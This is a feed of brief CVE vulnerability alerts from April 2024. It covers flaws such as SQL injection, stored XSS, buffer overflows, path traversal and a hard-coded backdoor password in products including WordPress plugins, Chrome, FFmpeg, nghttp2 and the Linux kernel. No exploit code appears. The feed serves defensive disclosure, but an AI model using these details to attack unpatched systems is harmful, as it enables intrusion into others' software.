| 2024-04-22 13:37:30 |
🚨 CVE-2024-31584Pytorch before v2.2.0 has an Out-of-bounds Read vulnerability via the component torch/csrc/jit/mobile/flatbuffer_loader.cpp.🎖@cveNotify |
|
| 2024-04-22 13:37:27 |
🚨 CVE-2024-30974SQL Injection vulnerability in autoexpress v.1.3.0 allows attackers to run arbitrary SQL commands via the carId parameter.🎖@cveNotify |
|
| 2024-04-22 13:37:26 |
🚨 CVE-2024-22905Buffer Overflow vulnerability in ARM mbed-os v.6.17.0 allows a remote attacker to execute arbitrary code via a crafted script to the hciTrSerialRxIncoming function.🎖@cveNotify |
|
| 2024-04-22 13:37:25 |
🚨 CVE-2024-32652The adapter @hono/node-server allows you to run your Hono application on Node.js. Prior to 1.10.1, the application hangs when receiving a Host header with a value that `@hono/node-server` can't handle well. Invalid values are those that cannot be parsed by the `URL` as a hostname such as an empty string, slashes `/`, and other strings. The version 1.10.1 includes the fix for this issue.🎖@cveNotify |
|
| 2024-04-22 13:37:24 |
🚨 CVE-2024-31450Owncast is an open source, self-hosted, decentralized, single user live video streaming and chat server. The Owncast application exposes an administrator API at the URL /api/admin. The emoji/delete endpoint of said API allows administrators to delete custom emojis, which are saved on disk. The parameter name is taken from the JSON request and directly appended to the filepath that points to the emoji to delete. By using path traversal sequences (../), attackers with administrative privileges can exploit this endpoint to delete arbitrary files on the system, outside of the emoji directory. This vulnerability is fixed in 0.1.3.🎖@cveNotify |
|
| 2024-04-22 11:37:31 |
🚨 CVE-2024-32691Missing Authorization vulnerability in realmag777 Active Products Tables for WooCommerce.This issue affects Active Products Tables for WooCommerce: from n/a through 1.0.6.2.🎖@cveNotify |
|
| 2024-04-22 11:37:27 |
🚨 CVE-2024-32688Missing Authorization vulnerability in Long Watch Studio MyRewards.This issue affects MyRewards: from n/a through 5.3.0.🎖@cveNotify |
|
| 2024-04-22 11:37:26 |
🚨 CVE-2024-32684Missing Authorization vulnerability in Wpmet Wp Ultimate Review.This issue affects Wp Ultimate Review: from n/a through 2.2.5.🎖@cveNotify |
|
| 2024-04-22 11:37:25 |
🚨 CVE-2024-32682Missing Authorization vulnerability in BdThemes Prime Slider – Addons For Elementor.This issue affects Prime Slider – Addons For Elementor: from n/a through 3.13.2.🎖@cveNotify |
|
| 2024-04-22 11:37:24 |
🚨 CVE-2024-32681Missing Authorization vulnerability in BdThemes Prime Slider – Addons For Elementor.This issue affects Prime Slider – Addons For Elementor: from n/a through 3.13.2.🎖@cveNotify |
|
| 2024-04-22 08:37:30 |
🚨 CVE-2024-32698Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Leevio Happy Addons for Elementor allows Stored XSS.This issue affects Happy Addons for Elementor: from n/a through 3.10.4.🎖@cveNotify |
|
| 2024-04-22 08:37:29 |
🚨 CVE-2024-32697Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HelloAsso allows Stored XSS.This issue affects HelloAsso: from n/a through 1.1.5.🎖@cveNotify |
|
| 2024-04-22 08:37:26 |
🚨 CVE-2024-32696Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QuantumCloud Infographic Maker – iList allows Stored XSS.This issue affects Infographic Maker – iList: from n/a through 4.6.6.🎖@cveNotify |
|
| 2024-04-22 08:37:25 |
🚨 CVE-2024-32693Cross-Site Request Forgery (CSRF) vulnerability in ValvePress Automatic.This issue affects Automatic: from n/a before 3.93.0.🎖@cveNotify |
|
| 2024-04-22 08:37:24 |
🚨 CVE-2024-32690Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fahad Mahmood RSS Feed Widget allows Stored XSS.This issue affects RSS Feed Widget: from n/a through 2.9.7.🎖@cveNotify |
|
| 2024-04-22 05:37:24 |
🚨 CVE-2023-7252The Tickera WordPress plugin before 3.5.2.5 does not prevent users from leaking other users' tickets.🎖@cveNotify |
|
| 2024-04-22 01:37:25 |
🚨 CVE-2024-30799An issue in PX4 Autopilot v1.14 and before allows a remote attacker to execute arbitrary code and cause a denial of service via the Breach Return Point function.🎖@cveNotify |
|
| 2024-04-22 01:37:24 |
🚨 CVE-2024-28722Cross Site Scripting vulnerability in Innovaphone myPBX v.14r1, v.13r3, v.12r2 allows a remote attacker to execute arbitrary code via the query parameter to the /CMD0/xml_modes.xml endpoint🎖@cveNotify |
|
| 2024-04-21 20:37:24 |
🚨 CVE-2015-10132A vulnerability classified as problematic was found in Thimo Grauerholz WP-Spreadplugin up to 3.8.6.1 on WordPress. This vulnerability affects unknown code of the file spreadplugin.php. The manipulation of the argument Spreadplugin leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 3.8.6.6 is able to address this issue. The name of the patch is a9b9afc641854698e80aa5dd9ababfc8e0e57d69. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-261676.🎖@cveNotify |
|
| 2024-04-21 18:37:24 |
🚨 CVE-2024-29733Improper Certificate Validation vulnerability in Apache Airflow FTP Provider.The FTP hook lacks complete certificate validation in FTP_TLS connections, which can potentially be leveraged. Implementing proper certificate validation by passing context=ssl.create_default_context() during FTP_TLS instantiation is used as mitigation to validate the certificates properly.This issue affects Apache Airflow FTP Provider: before 3.7.0.Users are recommended to upgrade to version 3.7.0, which fixes the issue.🎖@cveNotify |
|
| 2024-04-21 16:37:26 |
🚨 CVE-2024-29217Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Answer.This issue affects Apache Answer: before 1.3.0.XSS attack when user changes personal website. A logged-in user, when modifying their personal website, can input malicious code in the website to create such an attack.Users are recommended to upgrade to version [1.3.0], which fixes the issue.🎖@cveNotify |
|
| 2024-04-21 11:37:26 |
🚨 CVE-2024-4022A vulnerability was found in Keenetic KN-1010, KN-1410, KN-1711, KN-1810 and KN-1910 up to 4.1.2.15. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /version.js of the component Version Data Handler. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-261674 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-21 10:37:24 |
🚨 CVE-2024-4021A vulnerability was found in Keenetic KN-1010, KN-1410, KN-1711, KN-1810 and KN-1910 up to 4.1.2.15. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /ndmComponents.js of the component Configuration Setting Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261673 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-21 04:37:37 |
🚨 CVE-2024-3847Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-04-21 04:37:36 |
🚨 CVE-2024-3845Inappropriate implementation in Networks in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass mixed content policy via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-04-21 04:37:35 |
🚨 CVE-2024-3844Inappropriate implementation in Extensions in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-04-21 04:37:32 |
🚨 CVE-2024-3843Insufficient data validation in Downloads in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-04-21 04:37:31 |
🚨 CVE-2024-3840Insufficient policy enforcement in Site Isolation in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-04-21 04:37:30 |
🚨 CVE-2024-3838Inappropriate implementation in Autofill in Google Chrome prior to 124.0.6367.60 allowed an attacker who convinced a user to install a malicious app to perform UI spoofing via a crafted app. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-04-21 04:37:26 |
🚨 CVE-2024-3834Use after free in Downloads in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-04-21 04:37:25 |
🚨 CVE-2024-3832Object corruption in V8 in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-04-21 04:37:24 |
🚨 CVE-2024-27316HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.🎖@cveNotify |
|
| 2024-04-21 03:37:26 |
🚨 CVE-2024-27316HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.🎖@cveNotify |
|
| 2024-04-21 03:37:25 |
🚨 CVE-2023-5752When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.🎖@cveNotify |
|
| 2024-04-20 23:37:24 |
🚨 CVE-2024-4020A vulnerability was found in Tenda FH1206 1.2.0.8(8155) and classified as critical. This issue affects the function fromAddressNat of the file /goform/addressNat. The manipulation of the argument entrys leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-261671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-20 16:09:16 |
None |
|
| 2024-04-20 14:37:24 |
🚨 CVE-2024-4019A vulnerability classified as critical has been found in Byzoro Smart S80 Management Platform up to 20240411. Affected is an unknown function of the file /importhtml.php. The manipulation of the argument sql leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-261666 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-20 10:37:24 |
🚨 CVE-2024-4014The hCaptcha for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cf7-hcaptcha shortcode in all versions up to, and including, 4.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-20 04:37:24 |
🚨 CVE-2024-1730The Prime Slider – Addons For Elementor (Revolution of a slider, Hero Slider, Media Slider, Drag Drop Slider, Video Slider, Product Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via urls in link fields, images from URLs, and html tags used in widgets in all versions up to, and including, 3.14.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-20 03:37:30 |
🚨 CVE-2024-2961The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.🎖@cveNotify |
|
| 2024-04-20 03:37:29 |
🚨 CVE-2024-28182nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. The nghttp2 library prior to version 1.61.0 keeps reading the unbounded number of HTTP/2 CONTINUATION frames even after a stream is reset to keep HPACK context in sync. This causes excessive CPU usage to decode HPACK stream. nghttp2 v1.61.0 mitigates this vulnerability by limiting the number of CONTINUATION frames it accepts per stream. There is no workaround for this vulnerability.🎖@cveNotify |
|
| 2024-04-20 03:37:26 |
🚨 CVE-2024-24680An issue was discovered in Django 3.2 before 3.2.24, 4.2 before 4.2.10, and Django 5.0 before 5.0.2. The intcomma template filter was subject to a potential denial-of-service attack when used with very long strings.🎖@cveNotify |
|
| 2024-04-20 03:37:25 |
🚨 CVE-2023-41164In Django 3.2 before 3.2.21, 4.1 before 4.1.11, and 4.2 before 4.2.5, django.utils.encoding.uri_to_iri() is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters.🎖@cveNotify |
|
| 2024-04-20 03:37:24 |
🚨 CVE-2023-36053In Django 3.2 before 3.2.20, 4 before 4.1.10, and 4.2 before 4.2.3, EmailValidator and URLValidator are subject to a potential ReDoS (regular expression denial of service) attack via a very large number of domain name labels of emails and URLs.🎖@cveNotify |
|
| 2024-04-20 02:37:25 |
🚨 CVE-2024-27983An attacker can make the Node.js HTTP/2 server completely unavailable by sending a small amount of HTTP/2 frames packets with a few HTTP/2 frames inside. It is possible to leave some data in nghttp2 memory after reset when headers with HTTP/2 CONTINUATION frame are sent to the server and then a TCP connection is abruptly closed by the client triggering the Http2Session destructor while header frames are still being processed (and stored in memory) causing a race condition.🎖@cveNotify |
|
| 2024-04-20 02:37:24 |
🚨 CVE-2024-28182nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. The nghttp2 library prior to version 1.61.0 keeps reading the unbounded number of HTTP/2 CONTINUATION frames even after a stream is reset to keep HPACK context in sync. This causes excessive CPU usage to decode HPACK stream. nghttp2 v1.61.0 mitigates this vulnerability by limiting the number of CONTINUATION frames it accepts per stream. There is no workaround for this vulnerability.🎖@cveNotify |
|
| 2024-04-19 23:37:44 |
🚨 CVE-2024-25692There is a cross-site-request forgery vulnerability in Esri Portal for ArcGIS Versions 11.1 and below that may in some cases allow a remote, unauthenticated attacker to trick an authorized user into executing unwanted actions via a crafted form. The impact to Confidentiality and Integrity vectors is limited and of low severity.🎖@cveNotify |
|
| 2024-04-19 23:37:43 |
🚨 CVE-2024-25690There is an HTML injection vulnerability in Esri Portal for ArcGIS versions 11.1 and below that may allow a remote, unauthenticated attacker to create a crafted link which when clicked could render arbitrary HTML in the victim’s browser.🎖@cveNotify |
|
| 2024-04-19 23:37:42 |
🚨 CVE-2024-30261Undici is an HTTP/1.1 client, written from scratch for Node.js. An attacker can alter the `integrity` option passed to `fetch()`, allowing `fetch()` to accept requests as valid even if they have been tampered. This vulnerability was patched in version(s) 5.28.4 and 6.11.1.🎖@cveNotify |
|
| 2024-04-19 23:37:38 |
🚨 CVE-2024-28182nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. The nghttp2 library prior to version 1.61.0 keeps reading the unbounded number of HTTP/2 CONTINUATION frames even after a stream is reset to keep HPACK context in sync. This causes excessive CPU usage to decode HPACK stream. nghttp2 v1.61.0 mitigates this vulnerability by limiting the number of CONTINUATION frames it accepts per stream. There is no workaround for this vulnerability.🎖@cveNotify |
|
| 2024-04-19 23:37:37 |
🚨 CVE-2024-3209A vulnerability was found in UPX up to 4.2.2. It has been rated as critical. This issue affects the function get_ne64 of the file bele.h. The manipulation leads to heap-based buffer overflow. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259055. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-19 23:37:36 |
🚨 CVE-2024-28960An issue was discovered in Mbed TLS 2.18.0 through 2.28.x before 2.28.8 and 3.x before 3.6.0, and Mbed Crypto. The PSA Crypto API mishandles shared memory.🎖@cveNotify |
|
| 2024-04-19 23:37:32 |
🚨 CVE-2024-2004When a protocol selection parameter option disables all protocols without adding any then the default set of protocols would remain in the allowed set due to an error in the logic for removing protocols. The below command would perform a request to curl.se with a plaintext protocol which has been explicitly disabled. curl --proto -all,-http http://curl.se The flaw is only present if the set of selected protocols disables the entire set of available protocols, in itself a command with no practical use and therefore unlikely to be encountered in real situations. The curl security team has thus assessed this to be low severity bug.🎖@cveNotify |
|
| 2024-04-19 23:37:31 |
🚨 CVE-2023-50967latchset jose through version 11 allows attackers to cause a denial of service (CPU consumption) via a large p2c (aka PBES2 Count) value.🎖@cveNotify |
|
| 2024-04-19 23:37:30 |
🚨 CVE-2024-2002A double-free vulnerability was found in libdwarf. In a multiply-corrupted DWARF object, libdwarf may try to dealloc(free) an allocation twice, potentially causing unpredictable and various results.🎖@cveNotify |
|
| 2024-04-19 23:37:27 |
🚨 CVE-2024-1931NLnet Labs Unbound version 1.18.0 up to and including version 1.19.1 contain a vulnerability that can cause denial of service by a certain code path that can lead to an infinite loop. Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used; non default configuration. From version 1.19.2 on, the code is fixed to avoid looping indefinitely.🎖@cveNotify |
|
| 2024-04-19 23:37:26 |
🚨 CVE-2024-25629c-ares is a C library for asynchronous DNS requests. `ares__read_line()` is used to parse local configuration files such as `/etc/resolv.conf`, `/etc/nsswitch.conf`, the `HOSTALIASES` file, and if using a c-ares version prior to 1.27.0, the `/etc/hosts` file. If any of these configuration files has an embedded `NULL` character as the first character in a new line, it can lead to attempting to read memory prior to the start of the given buffer which may result in a crash. This issue is fixed in c-ares 1.27.0. No known workarounds exist.🎖@cveNotify |
|
| 2024-04-19 23:37:25 |
🚨 CVE-2022-31629In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications.🎖@cveNotify |
|
| 2024-04-19 22:37:25 |
🚨 CVE-2024-1480Unitronics Vision Standard line of controllers allow the Information Mode password to be retrieved without authentication.🎖@cveNotify |
|
| 2024-04-19 22:37:24 |
🚨 CVE-2023-29323ascii_load_sockaddr in smtpd in OpenBSD before 7.1 errata 024 and 7.2 before errata 020, and OpenSMTPD Portable before 7.0.0-portable commit f748277, can abort upon a connection from a local, scoped IPv6 address.🎖@cveNotify |
|
| 2024-04-19 21:37:31 |
🚨 CVE-2024-4017Improper Privilege Management vulnerability in BeyondTrust U-Series Appliance on Windows, 64 bit (filesystem modules) allows DLL Side-Loading.This issue affects U-Series Appliance: from 3.4 before 4.0.3.🎖@cveNotify |
|
| 2024-04-19 21:37:30 |
🚨 CVE-2024-32391Cross Site Scripting vulnerability in MacCMS v.10 v.2024.1000.3000 allows a remote attacker to execute arbitrary code via a crafted payload.🎖@cveNotify |
|
| 2024-04-19 21:37:29 |
🚨 CVE-2024-31993Mealie is a self hosted recipe manager and meal planner. Prior to 1.4.0, the scrape_image function will retrieve an image based on a user-provided URL, however the provided URL is not validated to point to an external location and does not have any enforced rate limiting. The response from the Mealie server will also vary depending on whether or not the target file is an image, is not an image, or does not exist. Additionally, when a file is retrieved the file may remain stored on Mealie’s file system as original.jpg under the UUID of the recipe it was requested for. If the attacker has access to an admin account (e.g. the default changeme@example.com), this file can then be retrieved. Note that if Mealie is running in a development setting this could be leveraged by an attacker to retrieve any file that the Mealie server had downloaded in this fashion without the need for administrator access. This vulnerability is fixed in 1.4.0.🎖@cveNotify |
|
| 2024-04-19 21:37:26 |
🚨 CVE-2024-31992Mealie is a self hosted recipe manager and meal planner. Prior to 1.4.0, the safe_scrape_html function utilizes a user-controlled URL to issue a request to a remote server, however these requests are not rate-limited. While there are efforts to prevent DDoS by implementing a timeout on requests, it is possible for an attacker to issue a large number of requests to the server which will be handled in batches based on the configuration of the Mealie server. The chunking of responses is helpful for mitigating memory exhaustion on the Mealie server, however a single request to an arbitrarily large external file (e.g. a Debian ISO) is often sufficient to completely saturate a CPU core assigned to the Mealie container. Without rate limiting in place, it is possible to not only sustain traffic against an external target indefinitely, but also to exhaust the CPU resources assigned to the Mealie container. This vulnerability is fixed in 1.4.0.🎖@cveNotify |
|
| 2024-04-19 21:37:25 |
🚨 CVE-2024-30974SQL Injection vulnerability in autoexpress v.1.3.0 allows attackers to run arbitrary SQL commands via the carId parameter.🎖@cveNotify |
|
| 2024-04-19 21:37:24 |
🚨 CVE-2024-22905Buffer Overflow vulnerability in ARM mbed-os v.6.17.0 allows a remote attacker to execute arbitrary code via a crafted script to the hciTrSerialRxIncoming function.🎖@cveNotify |
|
| 2024-04-19 20:37:24 |
🚨 CVE-2024-1681corydolphin/flask-cors is vulnerable to log injection when the log level is set to debug. An attacker can inject fake log entries into the log file by sending a specially crafted GET request containing a CRLF sequence in the request path. This vulnerability allows attackers to corrupt log files, potentially covering tracks of other attacks, confusing log post-processing tools, and forging log entries. The issue is due to improper output neutralization for logs.🎖@cveNotify |
|
| 2024-04-19 19:37:33 |
🚨 CVE-2024-31450Owncast is an open source, self-hosted, decentralized, single user live video streaming and chat server. The Owncast application exposes an administrator API at the URL /api/admin. The emoji/delete endpoint of said API allows administrators to delete custom emojis, which are saved on disk. The parameter name is taken from the JSON request and directly appended to the filepath that points to the emoji to delete. By using path traversal sequences (../), attackers with administrative privileges can exploit this endpoint to delete arbitrary files on the system, outside of the emoji directory. This vulnerability is fixed in 0.1.3.🎖@cveNotify |
|
| 2024-04-19 19:37:32 |
🚨 CVE-2021-47198In the Linux kernel, the following vulnerability has been resolved:scsi: lpfc: Fix use-after-free in lpfc_unreg_rpi() routineAn error is detected with the following report when unloading the driver: "KASAN: use-after-free in lpfc_unreg_rpi+0x1b1b"The NLP_REG_LOGIN_SEND nlp_flag is set in lpfc_reg_fab_ctrl_node(), but theflag is not cleared upon completion of the login.This allows a second call to lpfc_unreg_rpi() to proceed with nlp_rpi setto LPFC_RPI_ALLOW_ERROR. This results in a use after free access when usedas an rpi_ids array index.Fix by clearing the NLP_REG_LOGIN_SEND nlp_flag inlpfc_mbx_cmpl_fc_reg_login().🎖@cveNotify |
|
| 2024-04-19 19:37:28 |
🚨 CVE-2021-47194In the Linux kernel, the following vulnerability has been resolved:cfg80211: call cfg80211_stop_ap when switch from P2P_GO typeIf the userspace tools switch from NL80211_IFTYPE_P2P_GO toNL80211_IFTYPE_ADHOC via send_msg(NL80211_CMD_SET_INTERFACE), itdoes not call the cleanup cfg80211_stop_ap(), this leads to theinitialization of in-use data. For example, this path re-init thesdata->assigned_chanctx_list while it is still an element ofassigned_vifs list, and makes that linked list corrupt.🎖@cveNotify |
|
| 2024-04-19 19:37:27 |
🚨 CVE-2021-47193In the Linux kernel, the following vulnerability has been resolved:scsi: pm80xx: Fix memory leak during rmmodDriver failed to release all memory allocated. This would lead to memoryleak during driver removal.Properly free memory when the module is removed.🎖@cveNotify |
|
| 2024-04-19 19:37:26 |
🚨 CVE-2024-25180An issue discovered in pdfmake 0.2.9 allows remote attackers to run arbitrary code via crafted POST request to the path '/pdf'.🎖@cveNotify |
|
| 2024-04-19 19:07:26 |
🚨 CVE-2023-52459In the Linux kernel, the following vulnerability has been resolved:media: v4l: async: Fix duplicated list deletionThe list deletion call dropped here is already called from thehelper function in the line before. Having a second list_del()call results in either a warning (with CONFIG_DEBUG_LIST=y):list_del corruption, c46c8198->next is LIST_POISON1 (00000100)If CONFIG_DEBUG_LIST is disabled the operation results in akernel error due to NULL pointer dereference.🎖@cveNotify |
|
| 2024-04-19 19:07:25 |
🚨 CVE-2023-52454In the Linux kernel, the following vulnerability has been resolved:nvmet-tcp: Fix a kernel panic when host sends an invalid H2C PDU lengthIf the host sends an H2CData command with an invalid DATAL,the kernel may crash in nvmet_tcp_build_pdu_iovec().Unable to handle kernel NULL pointer dereference atvirtual address 0000000000000000lr : nvmet_tcp_io_work+0x6ac/0x718 [nvmet_tcp]Call trace: process_one_work+0x174/0x3c8 worker_thread+0x2d0/0x3e8 kthread+0x104/0x110Fix the bug by raising a fatal error if DATAL isn't coherentwith the packet size.Also, the PDU length should never exceed the MAXH2CDATA parameter whichhas been communicated to the host in nvmet_tcp_handle_icreq().🎖@cveNotify |
|
| 2024-04-19 19:07:24 |
🚨 CVE-2024-26594In the Linux kernel, the following vulnerability has been resolved:ksmbd: validate mech token in session setupIf client send invalid mech token in session setup request, ksmbdvalidate and make the error if it is invalid.🎖@cveNotify |
|
| 2024-04-19 18:37:48 |
🚨 CVE-2024-31552CuteHttpFileServer v.3.1 version has an arbitrary file download vulnerability, which allows attackers to download arbitrary files on the server and obtain sensitive information.🎖@cveNotify |
|
| 2024-04-19 18:37:47 |
🚨 CVE-2023-51798Buffer Overflow vulnerability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via a floating point exception (FPE) error at libavfilter/vf_minterpolate.c:1078:60 in interpolate.🎖@cveNotify |
|
| 2024-04-19 18:37:46 |
🚨 CVE-2023-51797Buffer Overflow vulnerability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via the libavfilter/avf_showwaves.c:722:24 in showwaves_filter_frame🎖@cveNotify |
|
| 2024-04-19 18:37:42 |
🚨 CVE-2023-51796Buffer Overflow vulnerability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via the libavfilter/f_reverse.c:269:26 in areverse_request_frame.🎖@cveNotify |
|
| 2024-04-19 18:37:41 |
🚨 CVE-2023-51793Buffer Overflow vulnerability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via the libavutil/imgutils.c:353:9 in image_copy_plane.🎖@cveNotify |
|
| 2024-04-19 18:37:40 |
🚨 CVE-2023-51791Buffer Overflow vulenrability in Ffmpeg v.N113007-g8d24a28d06 allows a local attacker to execute arbitrary code via the libavcodec/jpegxl_parser.c in gen_alias_map.🎖@cveNotify |
|
| 2024-04-19 18:37:36 |
🚨 CVE-2023-50010Buffer Overflow vulnerability in Ffmpeg v.n6.1-3-g466799d4f5 allows a local attacker to execute arbitrary code via the set_encoder_id function in /fftools/ffmpeg_enc.c component.🎖@cveNotify |
|
| 2024-04-19 18:37:35 |
🚨 CVE-2023-50008Buffer Overflow vulnerability in Ffmpeg v.n6.1-3-g466799d4f5 allows a local attacker to execute arbitrary code via the av_malloc function in libavutil/mem.c:105:9 component.🎖@cveNotify |
|
| 2024-04-19 18:37:34 |
🚨 CVE-2023-49963DYMO LabelWriter Print Server through 2.366 contains a backdoor hard-coded password that could allow an attacker to take control.🎖@cveNotify |
|
| 2024-04-19 18:37:30 |
🚨 CVE-2023-49502Buffer Overflow vulnerability in Ffmpeg v.n6.1-3-g466799d4f5 allows a local attacker to execute arbitrary code via the ff_bwdif_filter_intra_c function in the libavfilter/bwdifdsp.c:125:5 component.🎖@cveNotify |
|
| 2024-04-19 18:07:25 |
🚨 CVE-2024-26593In the Linux kernel, the following vulnerability has been resolved:i2c: i801: Fix block process call transactionsAccording to the Intel datasheets, software must reset the blockbuffer index twice for block process call transactions: once beforewriting the outgoing data to the buffer, and once again beforereading the incoming data from the buffer.The driver is currently missing the second reset, causing the wrongportion of the block buffer to be read.🎖@cveNotify |
|
| 2024-04-19 18:07:24 |
🚨 CVE-2024-26581In the Linux kernel, the following vulnerability has been resolved:netfilter: nft_set_rbtree: skip end interval element from gcrbtree lazy gc on insert might collect an end interval element that hasbeen just added in this transactions, skip end interval elements thatare not yet active.🎖@cveNotify |
|
| 2024-04-19 17:37:26 |
🚨 CVE-2021-2104Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: Dialog Box). Supported versions that are affected are 11.5.10, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Complex Maintenance, Repair, and Overhaul. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Complex Maintenance, Repair, and Overhaul, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Complex Maintenance, Repair, and Overhaul accessible data as well as unauthorized update, insert or delete access to some of Oracle Complex Maintenance, Repair, and Overhaul accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).🎖@cveNotify |
|
| 2024-04-19 17:37:25 |
🚨 CVE-2021-2103Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: Dialog Box). Supported versions that are affected are 11.5.10, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Complex Maintenance, Repair, and Overhaul. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Complex Maintenance, Repair, and Overhaul, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Complex Maintenance, Repair, and Overhaul accessible data as well as unauthorized update, insert or delete access to some of Oracle Complex Maintenance, Repair, and Overhaul accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).🎖@cveNotify |
|
| 2024-04-19 17:37:24 |
